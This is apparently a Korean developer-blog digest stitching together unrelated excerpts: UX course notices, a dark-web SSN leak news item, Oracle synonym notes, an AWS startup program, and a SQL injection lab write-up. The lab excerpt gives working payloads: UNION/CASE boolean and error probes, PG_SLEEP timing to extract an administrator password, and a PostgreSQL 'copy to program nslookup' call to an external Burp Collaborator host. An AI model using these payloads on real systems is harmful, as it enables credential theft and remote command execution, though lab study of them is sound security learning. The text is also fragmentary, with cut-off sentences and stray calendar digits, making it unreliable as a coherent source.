카테고리 없음
2020-07-14 18시 개발자 글 모음 | "국내 스타트업 지원을 위한 ‘AWS " 외 16개 이야기
데브피드
2020. 7. 14. 18:46
- 요즘 국내/해외 UX 방법론 A-Z 연구하는데 열중하고 있습니다
- UX 정규 강좌: [한국인터넷전문가협회] UX포트폴리오 1기 과정 #8월18일 개강(총 192시간)
- Top UI/UX Design Works for Inspiration — #111
- Cyble Experts의 보안 전문가들이 다크 웹에서 미국 시민 약 4만 명의 개인정보와 SSN이 다크 웹에서 판매 중인 것을 발견했습니다
- 전문가들은 꽤 평판 높은 공격자가 미국 시민의 정보가 포함된 데이터베이스를 게시한 것을 발견했습니다
- SMS를 통해 금융 정보를 포함한 개인정보를 공유하지 말 것 강력한 패스워드를 사용하고 다중 인증을 활성화할 것 정기적으로 금융 거래를 모니터링할 것 의심스러운 거래가 포착될 경우 즉시 은행에 연락할 것 컴퓨터
- SQL-injection - SQL injection attack
- querying the database type and version on MySQL and Microsoft
- SQL-injection - SQL injection attack
- querying the database type and version on MySQL and Microsoft
- This blog contains Linux Kernel Analysis(4
- x) and kernel crash debugging case-study for seminar and lecture
- by AustinKim
- ' union select password from users where username='administrator' and length(password)>20-- == False
- ' union select password from users where username='administrator' and length(password)>19-- == True
- ' union select password from users where username='administrator' and ord('a') > 1 -- 도 정상적인 결과를 내놓지 않는다
- ' UNION SELECT CASE WHEN (1=2) THEN to_char(1/0) ELSE NULL END FROM dual -- 이러면 정상적으로 페이지가 로드되는데 즉
- ' UNION SELECT CASE WHEN (1=1) THEN NULL END FROM dual ELSE to_char(1/0) --
- 우선 password의 길이는 ' UNION SELECT CASE WHEN length(password)=20 THEN to_char(1/0) ELSE NULL END FROM users -- 을 통해 20이라는것을 알아냄
- 5 6 7 8 9 10 11
- 12 13 14 15 16 17 18
- 19 20 21 22 23 24 25
- 1)) & 1 = 1 THEN cast(PG_SLEEP(10) as TEXT) ELSE NULL END FROM users where username='administrator'; 이렇게 작성을 하면 될 것 같다
- 1)) & 1 = 1 THEN cast(PG_SLEEP(10) as TEXT) ELSE NULL END FROM users where username='administrator'-- 의 값이 문제 페이지에서 제대로 동작함을 확인했다
- 그전에 패스워드 길이를 보니 x' UNION SELECT CASE WHEN LENGTH(password)=20 THEN cast(PG_SLEEP(10) as TEXT) ELSE NULL END FROM users where username='administrator'-- 을 통해 20임을 확인할 수 있었다
- 우선 이전에 쭉 PostgreSQL을 사용하였으므로 먼저 테스트해보려고 copy (SELECT '') to program 'nslookup burpcollaborator
- 그래서 SELECT 'a' where False UNION SELECT CASE WHEN True THEN copy (SELECT '') to program 'nslookup burpcollaborator
- net' ELSE NULL END; 와 같이 copy 함수가 독립적인 query를 보장받을 것 같은 statement를 만들었는데 이것도 되지 않네
- 96 2020-Jul-13 10:07:53 UTC DNS 1655blrn8fj5lgyywpg1y95uvl1g44t
- 145 2020-Jul-13 10:08:44 UTC DNS oc4sh8xae2psr34l2cmo4wbh18767uw
- 164 2020-Jul-13 10:09:02 UTC DNS k7soc4s69ykomzzhx8hkzs6dw4232rr
- 또한 권한문제를 떠나서 시노님을 통해 어떤 테이블의 이름을 단순화 하거나 통일 시킬수 있기때문에 개발에 유용하게 사용 할 수도 있습니다
- 특정 테이블명이 변경되거나 했을때 시노님을 사용하므로 해서 시노님만 다시 정의 해주면 개발 소스를 그대로 유지 할 수 있는 장점이 있습니다
- 또한 프로시저와 마찬가지로 내부에서 어떤 약속된 데이터 흐름을 제어하거나 데이터를 가공을 할 수 있습니다
- 5 6 7 8 9 10 11
- 12 13 14 15 16 17 18
- 19 20 21 22 23 24 25
- 5 6 7 8 9 10 11
- 12 13 14 15 16 17 18
- 19 20 21 22 23 24 25
- AWS에서 중소벤처기업부·창업진흥원과 협력하여 신규 스타트업 지원 프로그램인 ‘정글 프로그램’ 을 시작합니다
- ‘정글’이라고 불리는 신규 프로그램은 혁신 기술을 보유한 30개의 스타트업을 차기 유니콘 기업 (기업 가치 10억 달러 이상) 으로 성장할 수 있도록 지원하기 위해 마련되었으며
- AWS 클라우드를 기반으로 스타트업 비즈니스를 구축하는데 필요한 리소스를 제공하는 AWS Activate 프로그램을 포함하여 다양한 프로그램 및 행사를 통해 스타트업 생태계분들과 함께하고 있습니다